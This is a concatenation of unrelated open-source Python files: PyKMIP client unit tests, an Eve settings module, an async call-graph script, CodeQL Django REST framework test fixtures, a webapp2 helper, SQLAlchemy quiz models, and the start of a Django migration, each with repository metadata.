to open an opened client connection.
"""
client = ProxyKmipClient()
client.open()
self.assertRaises(ClientConnectionFailure, client.open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_open_on_proxy_failure(self):
"""
Test that an Exception is raised when an error occurs while opening
the client proxy connection.
"""
client = ProxyKmipClient()
client.proxy.open.side_effect = Exception
self.assertRaises(Exception, client.open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_close(self):
"""
Test that the client can close an open connection.
"""
client = ProxyKmipClient()
client.open()
client.close()
client.proxy.close.assert_called_with()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_close_on_close(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to close a closed client connection.
"""
client = ProxyKmipClient()
self.assertRaises(ClientConnectionNotOpen, client.close)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_close_on_proxy_failure(self):
"""
Test that an Exception is raised when an error occurs while closing
the client proxy connection.
"""
client = ProxyKmipClient()
client._is_open = True
client.proxy.close.side_effect = Exception
self.assertRaises(Exception, client.close)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_enter(self):
"""
Test the result and effect of the enter method for the context
manager.
"""
client = ProxyKmipClient()
self.assertFalse(client._is_open)
result = client.__enter__()
self.assertEqual(result, client)
self.assertTrue(client._is_open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_exit(self):
"""
Test the result and effect of the exit method for the context
manager.
"""
client = ProxyKmipClient()
client.__enter__()
self.assertTrue(client._is_open)
client.__exit__(None, None, None)
self.assertFalse(client._is_open)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_context_manager(self):
"""
        Test that the KmipClient can be used with the with-statement as a
context manager.
"""
with ProxyKmipClient() as client:
self.assertTrue(client._is_open)
client.proxy.open.assert_called_with()
self.assertFalse(client._is_open)
client.proxy.close.assert_called_with()
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create(self):
"""
Test that a symmetric key can be created with proper inputs and that
its UID is returned properly.
"""
# Create the template to test the create call
algorithm = enums.CryptographicAlgorithm.AES
length = 256
algorithm_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM, algorithm)
length_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH, length)
mask_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT])
attributes = [algorithm_attribute, length_attribute, mask_attribute]
template = obj.TemplateAttribute(attributes=attributes)
key_id = 'aaaaaaaa-1111-2222-3333-ffffffffffff'
status = enums.ResultStatus.SUCCESS
result = results.CreateResult(
contents.ResultStatus(status),
uuid=attr.UniqueIdentifier(key_id))
with ProxyKmipClient() as client:
client.proxy.create.return_value = result
uid = client.create(algorithm, length)
client.proxy.create.assert_called_with(
enums.ObjectType.SYMMETRIC_KEY, template)
self.assertIsInstance(uid, six.string_types)
self.assertEqual(uid, key_id)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_invalid_algorithm(self):
"""
Test that a TypeError exception is raised when trying to create a
symmetric key with an invalid algorithm.
"""
args = ['invalid', 256]
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_invalid_length(self):
"""
Test that a TypeError exception is raised when trying to create a
symmetric key with an invalid length.
"""
args = [enums.CryptographicAlgorithm.AES, 'invalid']
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to create a symmetric key on an unopened client connection.
"""
client = ProxyKmipClient()
args = [enums.CryptographicAlgorithm.AES, 256]
self.assertRaises(
ClientConnectionNotOpen, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_on_operation_failure(self):
"""
        Test that a KmipOperationFailure exception is raised when the
        backend fails to create a symmetric key.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.create.return_value = result
args = [enums.CryptographicAlgorithm.AES, 256]
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.create, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair(self):
"""
Test that an asymmetric key pair can be created with proper inputs
and that the UIDs of the public and private keys are returned
properly.
"""
# Create the template to test the create key pair call
algorithm = enums.CryptographicAlgorithm.RSA
length = 2048
algorithm_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM, algorithm)
length_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH, length)
mask_attribute = self.attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT])
attributes = [algorithm_attribute, length_attribute, mask_attribute]
template = obj.CommonTemplateAttribute(attributes=attributes)
status = enums.ResultStatus.SUCCESS
result = results.CreateKeyPairResult(
contents.ResultStatus(status),
public_key_uuid=attr.PublicKeyUniqueIdentifier(
'aaaaaaaa-1111-2222-3333-ffffffffffff'),
private_key_uuid=attr.PrivateKeyUniqueIdentifier(
'ffffffff-3333-2222-1111-aaaaaaaaaaaa'))
with ProxyKmipClient() as client:
client.proxy.create_key_pair.return_value = result
public_uid, private_uid = client.create_key_pair(
enums.CryptographicAlgorithm.RSA, 2048)
kwargs = {'common_template_attribute': template}
client.proxy.create_key_pair.assert_called_with(**kwargs)
self.assertIsInstance(public_uid, six.string_types)
self.assertIsInstance(private_uid, six.string_types)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_invalid_algorithm(self):
"""
Test that a TypeError exception is raised when trying to create an
asymmetric key pair with an invalid algorithm.
"""
args = ['invalid', 256]
with ProxyKmipClient() as client:
self.assertRaises(
TypeError, client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_invalid_length(self):
"""
Test that a TypeError exception is raised when trying to create an
asymmetric key pair with an invalid length.
"""
args = [enums.CryptographicAlgorithm.AES, 'invalid']
with ProxyKmipClient() as client:
self.assertRaises(
TypeError, client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to create an asymmetric key pair on an unopened client connection.
"""
client = ProxyKmipClient()
args = [enums.CryptographicAlgorithm.RSA, 2048]
self.assertRaises(
ClientConnectionNotOpen, client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_create_key_pair_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to create an asymmetric key pair.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.create_key_pair.return_value = result
args = [enums.CryptographicAlgorithm.RSA, 2048]
self.assertRaisesRegexp(
KmipOperationFailure, error_msg,
client.create_key_pair, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get(self):
"""
Test that a secret can be retrieved with proper input.
"""
# Key encoding obtained from Section 14.2 of the KMIP 1.1 test
# documentation.
secret = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
fact = factory.ObjectFactory()
result = results.GetResult(
contents.ResultStatus(enums.ResultStatus.SUCCESS),
uuid=attr.PublicKeyUniqueIdentifier(
'aaaaaaaa-1111-2222-3333-ffffffffffff'),
secret=fact.convert(secret))
with ProxyKmipClient() as client:
client.proxy.get.return_value = result
result = client.get('aaaaaaaa-1111-2222-3333-ffffffffffff')
client.proxy.get.assert_called_with(
'aaaaaaaa-1111-2222-3333-ffffffffffff')
self.assertIsInstance(result, objects.SymmetricKey)
self.assertEqual(result, secret)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get_on_invalid_uid(self):
"""
Test that a TypeError exception is raised when trying to retrieve a
secret with an invalid ID.
"""
args = [0]
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.get, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to retrieve a secret on an unopened client connection.
"""
client = ProxyKmipClient()
args = ['aaaaaaaa-1111-2222-3333-ffffffffffff']
self.assertRaises(ClientConnectionNotOpen, client.get, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_get_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to retrieve a secret.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.get.return_value = result
args = ['id']
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.get, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy(self):
"""
Test that the client can destroy a secret.
"""
status = enums.ResultStatus.SUCCESS
result = results.OperationResult(contents.ResultStatus(status))
with ProxyKmipClient() as client:
client.proxy.destroy.return_value = result
result = client.destroy(
'aaaaaaaa-1111-2222-3333-ffffffffffff')
client.proxy.destroy.assert_called_with(
'aaaaaaaa-1111-2222-3333-ffffffffffff')
self.assertEqual(None, result)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy_on_invalid_uid(self):
"""
Test that a TypeError exception is raised when trying to destroy a
secret with an invalid ID.
"""
args = [0]
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.destroy, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to destroy a secret on an unopened client connection.
"""
client = ProxyKmipClient()
args = ['aaaaaaaa-1111-2222-3333-ffffffffffff']
self.assertRaises(
ClientConnectionNotOpen, client.destroy, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_destroy_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to destroy a secret.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
client = ProxyKmipClient()
client.open()
client.proxy.destroy.return_value = result
args = ['id']
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.destroy, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register(self):
"""
Test that the client can register a key.
"""
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
result = results.RegisterResult(
contents.ResultStatus(enums.ResultStatus.SUCCESS),
uuid=attr.PublicKeyUniqueIdentifier(
'aaaaaaaa-1111-2222-3333-ffffffffffff'))
with ProxyKmipClient() as client:
client.proxy.register.return_value = result
uid = client.register(key)
self.assertTrue(client.proxy.register.called)
self.assertIsInstance(uid, six.string_types)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register_on_invalid_uid(self):
"""
Test that a TypeError exception is raised when trying to register a
key with an invalid key object.
"""
args = ['invalid']
with ProxyKmipClient() as client:
self.assertRaises(TypeError, client.register, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register_on_closed(self):
"""
Test that a ClientConnectionNotOpen exception is raised when trying
to register a key on an unopened client connection.
"""
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
client = ProxyKmipClient()
args = [key]
self.assertRaises(ClientConnectionNotOpen, client.register, *args)
@mock.patch('kmip.pie.client.KMIPProxy',
mock.MagicMock(spec_set=KMIPProxy))
def test_register_on_operation_failure(self):
"""
Test that a KmipOperationFailure exception is raised when the
backend fails to register a key.
"""
status = enums.ResultStatus.OPERATION_FAILED
reason = enums.ResultReason.GENERAL_FAILURE
message = "Test failure message"
result = results.OperationResult(
contents.ResultStatus(status),
contents.ResultReason(reason),
contents.ResultMessage(message))
error_msg = str(KmipOperationFailure(status, reason, message))
# Key encoding obtained from Section 14.2 of the KMIP 1.1 test
# documentation.
key_value = (
b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F')
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES, 128, key_value)
client = ProxyKmipClient()
client.open()
client.proxy.register.return_value = result
args = [key]
self.assertRaisesRegexp(
KmipOperationFailure, error_msg, client.register, *args)
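# Illustrative sketch, not part of the original test suite: the operations
# mocked above map onto a live ProxyKmipClient session roughly as below. The
# key length and the create/get/destroy flow are assumptions made for the
# example, not fixtures from this module.
def _example_live_usage():  # pragma: no cover
    with ProxyKmipClient() as client:
        uid = client.create(enums.CryptographicAlgorithm.AES, 256)
        key = client.get(uid)
        client.destroy(uid)
        return key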
| {
"content_hash": "3f54d2affeef3995cdb3700faefceb1c",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 76,
"avg_line_length": 37.542808219178085,
"alnum_prop": 0.6285062713797035,
"repo_name": "dmend/PyKMIP",
"id": "92fce568b29c3b0a50258f801ce99a8703472b0e",
"size": "22571",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmip/tests/unit/pie/test_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1202704"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
} |
'''
Created on Sep 21, 2015
@author: fteychene
'''
import os
from survey.settings import SurveyConfiguration
from result.settings import ResultConfiguration
SETTINGS = {
'DOMAIN': {
'survey': SurveyConfiguration.domain(),
'results': ResultConfiguration.domain(),
},
'DATE_FORMAT': '%Y-%m-%dT%H:%M:%S.%fZ',
'MONGO_HOST': os.environ.get('MONGODB_PORT_27017_TCP_ADDR') or 'localhost',
'MONGO_PORT': int(os.environ.get('MONGODB_PORT_27017_TCP_PORT') or '27017'),
'MONGO_DBNAME': 'survey_server',
'PROPAGATE_EXCEPTIONS': True,
}
HOOKS_REGISTERS = [
ResultConfiguration.hooks(),
]
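# Illustrative sketch, not part of this module: these settings follow the
# python-eve convention, so they would normally be handed to an Eve app at
# startup. The hook-wiring loop assumes each HOOKS_REGISTERS entry is a
# callable taking the app; adjust to the real shape of
# ResultConfiguration.hooks().
def create_app():
    from eve import Eve
    app = Eve(settings=SETTINGS)
    for register_hooks in HOOKS_REGISTERS:
        register_hooks(app)
    return app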
| {
"content_hash": "65401d10eaa673b2801e17e984f742fb",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 80,
"avg_line_length": 25.08,
"alnum_prop": 0.6634768740031898,
"repo_name": "fteychene/survey-server",
"id": "75cf84fd00a2a85b026ff9f688047c01b2732f18",
"size": "627",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5378"
}
],
"symlink_target": ""
} |
"""
Make a call graph for async functions.
Does not catch regular function calls.
"""
import string
from collections import OrderedDict
# utils
def is_func(line):
line = line.strip(string.whitespace)
return line.startswith('async def') or line.startswith('def')
all_whitespace = lambda line: not line.strip(string.whitespace)
def get_indent(line):
for i,c in enumerate(line):
if c not in string.whitespace:
return i
return -1
def find_func_names(lines):
"""Find all function names"""
def get_name(line):
return line.split('def ',1)[-1].split('(',1)[0]
names = []
found = False
indent = -1
for line in lines:
line = line.strip('\r\n')
if found and not all_whitespace(line):
if get_indent(line) <= indent:
found = False
if (not found) and is_func(line):
found = True
indent = get_indent(line)
names.append(get_name(line))
return names
def find_func(lines, name):
"""Find the lines of a specific function"""
is_my_func = lambda line: is_func(line) and name in line.split('(')[0]
found = False
indent = -1
last_line = ''
for line in lines:
line = line.strip('\r\n')
if last_line:
line = last_line+line.strip()
if line.strip().endswith(','):
last_line = line
else:
last_line = ''
if (not found) and is_my_func(line):
found = True
indent = get_indent(line)
elif found and not all_whitespace(line):
if get_indent(line) > indent:
yield line
else:
return # end of function
if not found:
raise Exception(f'{name} not found')
def process_func(lines, func_names):
"""Search for function calls"""
ret = OrderedDict()
for line in lines:
#print(f':: {line}')
for n in func_names:
if n+'(' in line:
name = line.split(n+'(')[0].split('(')[-1].split()[-1]+n
if name in ret:
ret[name] += 1
else:
ret[name] = 1
if 'await' in line:
line = line.split('await',1)[-1].strip()
if line.startswith('asyncio.ensure_future'):
line = line.split('(',1)[-1]
if 'rest_client.request' in line:
line = line.split(')',1)[0]+')'
else:
line = line.split('(',1)[0]
if line in ret:
ret[line] += 1
else:
ret[line] = 1
return ret
def analyze_calls(lines, funcname, indent=0, recurse=True):
func_names = find_func_names(lines)
calls = process_func(find_func(lines, funcname), func_names)
for c in calls:
if '.' in c and not c.startswith('self'):
continue
print(' '*indent+c)
if recurse:
if c.startswith('self.'):
c = c[5:]
try:
analyze_calls(lines, c, indent=indent+2, recurse=True)
except Exception as e:
#print(' '*indent,e)
pass
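# Illustrative sketch, not part of the original script: analyze_calls can be
# driven from an in-memory list of source lines as well as a file. The
# coroutine names below are invented for the example; this prints
# "self.fetch" and then "  self.request".
def _example_analyze():
    source = [
        'async def fetch(self):',
        '    await self.request()',
        'async def run(self):',
        '    await self.fetch()',
    ]
    analyze_calls(source, 'run', indent=0, recurse=True)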
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('filename')
parser.add_argument('function')
parser.add_argument('-r','--recurse',default=True)
args = parser.parse_args()
print(f'searching for {args.function} in file {args.filename}')
with open(args.filename) as f:
lines = f.readlines()
print('')
print('Calls: ')
analyze_calls(lines, args.function, indent=0, recurse=args.recurse)
if __name__ == '__main__':
main() | {
"content_hash": "4df57f3b8c880b1f1130da5815c3d5a4",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 74,
"avg_line_length": 30.130081300813007,
"alnum_prop": 0.5315704263356719,
"repo_name": "WIPACrepo/iceprod",
"id": "f4caaa5f582d8cc8ec6d634b12796c04961c3345",
"size": "3706",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "resources/call_graph.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "13893"
},
{
"name": "Dockerfile",
"bytes": "1761"
},
{
"name": "HTML",
"bytes": "34188"
},
{
"name": "JavaScript",
"bytes": "77425"
},
{
"name": "Python",
"bytes": "1403059"
},
{
"name": "Shell",
"bytes": "4328"
}
],
"symlink_target": ""
} |
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.exceptions import APIException
@api_view()
def normal_response(request): # $ requestHandler
# has no pre-defined content type, since that will be negotiated
# see https://www.django-rest-framework.org/api-guide/responses/
data = "data"
resp = Response(data) # $ HttpResponse responseBody=data
return resp
@api_view()
def plain_text_response(request): # $ requestHandler
    # this response is not the standard way to use the Django REST framework, but it
# certainly is possible -- notice that the response contains double quotes
data = 'this response will contain double quotes since it was a string'
resp = Response(data, None, None, None, None, "text/plain") # $ HttpResponse mimetype=text/plain responseBody=data
resp = Response(data=data, content_type="text/plain") # $ HttpResponse mimetype=text/plain responseBody=data
return resp
################################################################################
# Cookies
################################################################################
@api_view
def setting_cookie(request):
resp = Response() # $ HttpResponse
resp.set_cookie("key", "value") # $ CookieWrite CookieName="key" CookieValue="value"
resp.set_cookie(key="key4", value="value") # $ CookieWrite CookieName="key4" CookieValue="value"
resp.headers["Set-Cookie"] = "key2=value2" # $ MISSING: CookieWrite CookieRawHeader="key2=value2"
resp.cookies["key3"] = "value3" # $ CookieWrite CookieName="key3" CookieValue="value3"
resp.delete_cookie("key4") # $ CookieWrite CookieName="key4"
resp.delete_cookie(key="key4") # $ CookieWrite CookieName="key4"
return resp
################################################################################
# Exceptions
################################################################################
# see https://www.django-rest-framework.org/api-guide/exceptions/
@api_view(["GET", "POST"])
def exception_test(request): # $ requestHandler
data = "exception details"
# note: `code details` not exposed by default
code = "code details"
e1 = APIException(data, code) # $ HttpResponse responseBody=data
e2 = APIException(detail=data, code=code) # $ HttpResponse responseBody=data
raise e2
| {
"content_hash": "6e8a9807ebd6f2924dee5c6166cecdeb",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 118,
"avg_line_length": 47.32,
"alnum_prop": 0.621301775147929,
"repo_name": "github/codeql",
"id": "ec093499df63c897686815e6f1a2d64c08e5849a",
"size": "2366",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "python/ql/test/library-tests/frameworks/rest_framework/response_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP.NET",
"bytes": "3739"
},
{
"name": "Batchfile",
"bytes": "3534"
},
{
"name": "C",
"bytes": "410440"
},
{
"name": "C#",
"bytes": "21146000"
},
{
"name": "C++",
"bytes": "1352639"
},
{
"name": "CMake",
"bytes": "1809"
},
{
"name": "CodeQL",
"bytes": "32583145"
},
{
"name": "Dockerfile",
"bytes": "496"
},
{
"name": "EJS",
"bytes": "1478"
},
{
"name": "Emacs Lisp",
"bytes": "3445"
},
{
"name": "Go",
"bytes": "697562"
},
{
"name": "HTML",
"bytes": "58008"
},
{
"name": "Handlebars",
"bytes": "1000"
},
{
"name": "Java",
"bytes": "5417683"
},
{
"name": "JavaScript",
"bytes": "2432320"
},
{
"name": "Kotlin",
"bytes": "12163740"
},
{
"name": "Lua",
"bytes": "13113"
},
{
"name": "Makefile",
"bytes": "8631"
},
{
"name": "Mustache",
"bytes": "17025"
},
{
"name": "Nunjucks",
"bytes": "923"
},
{
"name": "Perl",
"bytes": "1941"
},
{
"name": "PowerShell",
"bytes": "1295"
},
{
"name": "Python",
"bytes": "1649035"
},
{
"name": "RAML",
"bytes": "2825"
},
{
"name": "Ruby",
"bytes": "299268"
},
{
"name": "Rust",
"bytes": "234024"
},
{
"name": "Shell",
"bytes": "23973"
},
{
"name": "Smalltalk",
"bytes": "23"
},
{
"name": "Starlark",
"bytes": "27062"
},
{
"name": "Swift",
"bytes": "204309"
},
{
"name": "Thrift",
"bytes": "3020"
},
{
"name": "TypeScript",
"bytes": "219623"
},
{
"name": "Vim Script",
"bytes": "1949"
},
{
"name": "Vue",
"bytes": "2881"
}
],
"symlink_target": ""
} |
import os
import json
import datetime
import webapp2
import pkgutil
from time import mktime
from google.appengine.api import users
from google.appengine.ext import ndb
def set_api_path(api_path):
__all__ = []
for loader, module_name, is_pkg in pkgutil.walk_packages(api_path):
__all__.append(module_name)
module = loader.find_module(module_name).load_module(module_name)
exec('%s = module' % module_name)
default_methods = webapp2.WSGIApplication.allowed_methods
allowed_methods = default_methods.union(('PATCH',))
webapp2.WSGIApplication.allowed_methods = allowed_methods
def to_epoch_ms(value):
return mktime(value.utctimetuple()) * 1000
def from_epoch_ms(value):
    return datetime.datetime.utcfromtimestamp(value / 1000)
def _to_json(value):
if isinstance(value, datetime.datetime):
return to_epoch_ms(value)
else:
return value
def stringify(obj):
return json.dumps(obj, default=_to_json)
class Endpoint(webapp2.RequestHandler):
def __init__(self, request, response):
self.initialize(request, response)
self.user = users.get_current_user()
self.user_id = self.user.user_id() if self.user else None
self.user_key = ndb.Key('User', self.user_id) if self.user else None
try:
self.entity = json.loads(request.body)
except ValueError:
self.entity = {}
def read_json(self):
return json.loads(self.request.body)
class App(webapp2.WSGIApplication):
def __init__(self, *args, **kwargs):
super(App, self).__init__(*args, **kwargs)
self.router.set_dispatcher(self.__class__.custom_dispatcher)
@staticmethod
def custom_dispatcher(router, request, response):
route, args, kwargs = rv = router.match(request)
request.route, request.route_args, request.route_kwargs = rv
if route.handler_adapter is None:
handler = route.handler
if isinstance(handler, basestring):
if handler not in router.handlers:
                    router.handlers[handler] = handler = webapp2.import_string(handler)
else:
handler = router.handlers[handler]
route.handler_adapter = router.adapt(handler)
output = route.handler_adapter(request, response)
if isinstance(output, webapp2.Response): return output
if isinstance(output, int): return webapp2.Response(status = output)
if isinstance(output, tuple): return webapp2.Response(output[1], output[0])
output = webapp2.Response(stringify(output))
output.headers['Content-Type'] = 'application/json'
return output
def route(self, url, mime = None, *args, **kwargs):
def wrapper(handler):
route = webapp2.Route(url, handler=handler, *args, **kwargs)
route.mime = mime
self.router.add(route)
return handler
return wrapper
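# Illustrative sketch, not part of this module: wiring a JSON endpoint onto
# the App class above. The URL and handler are invented for the example; a
# plain dict return value is serialized by custom_dispatcher via stringify().
def _example_app():
    app = App(debug=True)
    @app.route('/api/ping')
    def ping(request, *args, **kwargs):
        return {'pong': True}
    return app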
| {
"content_hash": "50fe4dc5d7f2a874015a5be95ff407a8",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 83,
"avg_line_length": 34.27906976744186,
"alnum_prop": 0.6472184531886025,
"repo_name": "trevorhreed/gae-demo",
"id": "036387737a82263e8387257f9f3d27906d787442",
"size": "2948",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "508"
},
{
"name": "HTML",
"bytes": "1629"
},
{
"name": "JavaScript",
"bytes": "19937"
},
{
"name": "Python",
"bytes": "5274"
}
],
"symlink_target": ""
} |
"""Database models"""
# pylint: disable=invalid-name,too-few-public-methods
from sqlalchemy import Column, ForeignKey, Integer, Text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
Base = declarative_base()
class Question(Base):
"""Quizz question model"""
__tablename__ = 'question'
id = Column(Integer, primary_key=True)
text = Column(Text)
answers = relationship(
'Answer',
back_populates='question',
cascade='all, delete, delete-orphan',
)
class Answer(Base):
"""Quizz answer model"""
__tablename__ = 'answer'
id = Column(Integer, primary_key=True)
text = Column(Text)
question_id = Column(Integer, ForeignKey('question.id'))
question = relationship('Question', back_populates='answers')
class Taunt(Base):
"""Taunt model"""
__tablename__ = 'taunt'
id = Column(Integer, primary_key=True)
nick = Column(Text)
text = Column(Text)
aggro = Column(Integer, default=5)
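# Illustrative sketch, not part of the original module: typical usage of these
# models against an in-memory SQLite engine. The engine URL and sample text
# are assumptions made for the example.
def _example_session():
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine('sqlite:///:memory:')
    Base.metadata.create_all(engine)
    session = sessionmaker(bind=engine)()
    question = Question(text='What is the answer?')
    question.answers.append(Answer(text='42'))
    session.add(question)
    session.commit()
    return session.query(Question).count()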
| {
"content_hash": "cbd7d163405572c4baa29f73beb589ea",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 65,
"avg_line_length": 22.77777777777778,
"alnum_prop": 0.6604878048780488,
"repo_name": "virtualtam/botibal",
"id": "7fbe90bbb6d58f60ade4d7a94325e17cd39b3bc5",
"size": "1025",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "botibal/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "424"
},
{
"name": "Makefile",
"bytes": "516"
},
{
"name": "Python",
"bytes": "57520"
}
],
"symlink_target": ""
} |
""" Unit testing stuff """
| {
"content_hash": "6d143cfeebce9a51afaa0a129c7aae67",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 26,
"avg_line_length": 27,
"alnum_prop": 0.5925925925925926,
"repo_name": "dustinbcox/email_parser",
"id": "431496ad7d6ab5515c1b7d1bbae2ed3a5056eeec",
"size": "27",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7000"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations
import share.robot
